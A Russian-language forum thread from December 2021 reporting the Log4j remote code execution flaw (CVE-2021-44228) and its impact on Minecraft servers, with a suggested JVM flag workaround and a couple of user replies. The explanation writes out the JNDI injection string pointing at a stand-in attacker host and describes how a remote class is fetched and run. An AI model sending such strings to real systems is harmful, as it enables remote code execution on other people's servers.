Загрузка...

Leak Catastrophic vulnerability in Apache Log4j affecting many Java projects

Thread in Minecraft created by RocketDude Dec 10, 2021. (bumped Dec 12, 2021) 1045 views

  1. RocketDude
    RocketDude Topic starter Dec 10, 2021 ДОМЕНЫ https://zelenka.guru/threads/2865040/ 4362 Nov 21, 2018
    В Apache Log4j, популярном фреймворке для организации ведения ***** в Java-приложениях, выявлена критическая уязвимость, позволяющая выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках. Отмечается, что проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft. Ожидается, что уявзимость может привести к волне массовых атак на корпоративные приложения, повторив историю критических уязвимостей во фреймворке Apache Struts, который по приблизительной оценке применяется в web-приложениях 65% компаний из списка Fortune 100. В том числе уже зафиксированы попытки сканирования сети на предмет уязвимых систем. Проблема усугубляется тем, что уже опубликован рабочий эксплоит, но исправления для стабильных веток на данный момент не сфромированы. СVE-идентификатор пока не присвоен. Исправление включено только в тестовую ветку log4j-2.15.0-rc1. В качестве обходного пути блокирования уязвимости рекомендуется выставить параметр log4j2.formatMsgNoLookups в значение true. Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения. Дополнение 1: Уязвимости присвоен идентификатор CVE-2021-44228. Дополнение 2: Выявлен способ обхода защиты, добавленной выпуск log4j-2.15.0-rc1. Предложено новое обновление log4j-2.15.0-rc2 с более полной защитой от уязвимости. В коде выделяется изменение, связанное с отсутствием аварийного завершения в случае использования некорректно оформленного JNDI URL.

    [IMG] Minecraft под атакой: тысячи серверов перестали работать.

    Была обнаружена критическая уязвимость, которая затрагивает все версии, начиная с 1.7: игроки могут запускать код на чужих устройствах с помощью внутриигровых сообщений, останавливая работу серверов. Эта же уязвимость позволяет узнать IP-адреса участников сервера и именно поэтому сейчас не рекомендуется заходить во вкладку «Сетевая игра».

    Чтобы пофиксить уязвимость добавьте следующий JVM аргумент в командую строку до того, как версия 1.18.1 станет доступна:
    -Dlog4j2.formatMsgNoLookups=true


    Да и похуй что копипаст, главное людей уведомить
     
  2. kosmos_s
    kosmos_s Dec 10, 2021 0 Jun 12, 2017
    А че делать если этот код уже выполнили на тебе :clown:
    Играл в майн на 1.12.2 и какой-то чел зашёл, использовал уязвимость и всех на сервере кикнуло
     
    1. Nuclear_Cat
      kosmos_s, скинь **** в тот момень. там его айпи написан
Top
Loading...